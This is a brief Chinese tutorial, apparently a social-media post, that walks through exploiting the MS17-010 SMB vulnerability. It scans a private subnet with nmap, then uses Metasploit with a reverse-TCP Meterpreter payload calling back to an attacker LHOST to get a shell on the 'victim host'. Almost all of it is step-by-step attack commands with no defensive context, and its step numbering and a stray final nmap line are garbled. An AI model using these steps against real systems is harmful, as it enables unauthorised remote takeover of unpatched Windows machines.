探秘网络脆弱性：从扫描到渗透，揭示MS17-010漏洞的危险力量

一、通过Nmap扫描到存在漏洞的目标主机

1、扫描开放445端口的主机

nmap -n -p 445 192.168.28.100-150 --open

2、对开放455端口的ip主机进行脚本扫描，看是否存在ms17-010漏洞

nmap --script smb-vuln-ms17-010 192.168.28.138 --open

二、通过MSF进行漏洞利用

1、启动 Metasploit 控制台：

 msfconsole

2、搜索漏洞模块：

在 Metasploit 控制台中，可以使用 search 命令来搜索漏洞模块。输入以下命令搜索 MS17-010 漏洞模块，这将列出与 MS17-010 相关的漏洞模块。

search ms17-010

3、选择合适的漏洞模块：

use 0

5、查看需要设置的参数

show options

4、配置漏洞模块参数：

set RHOSTS 192.168.28.138

5、设置 Payload：

Payload 是在成功利用漏洞后要执行的代码。使用 set PAYLOAD 命令来设置 Payload。例如，使用反向 Meterpreter Payload：

set PAYLOAD windows/x64/meterpreter/reverse_tcp

6、配置监听器参数：

设置监听器参数以便在成功利用漏洞后接收反向连接。例如：

set LHOST 192.168.28.182

6、执行攻击：

配置完所有参数后，使用 exploit 命令来执行攻击。如果一切设置正确，Metasploit 将尝试利用漏洞并与目标系统建立连接。

run

7、与受害主机进行交互：

如果攻击成功，你将进入 Meterpreter shell。你可以使用各种 Meterpreter 命令来与受害主机进行交互，获取信息、执行命令等。

nmap --script smb-vuln-ms17-010 192.168.28.138 --open0

欢迎关注公众号：小酒馆文案

获取每日抽奖送书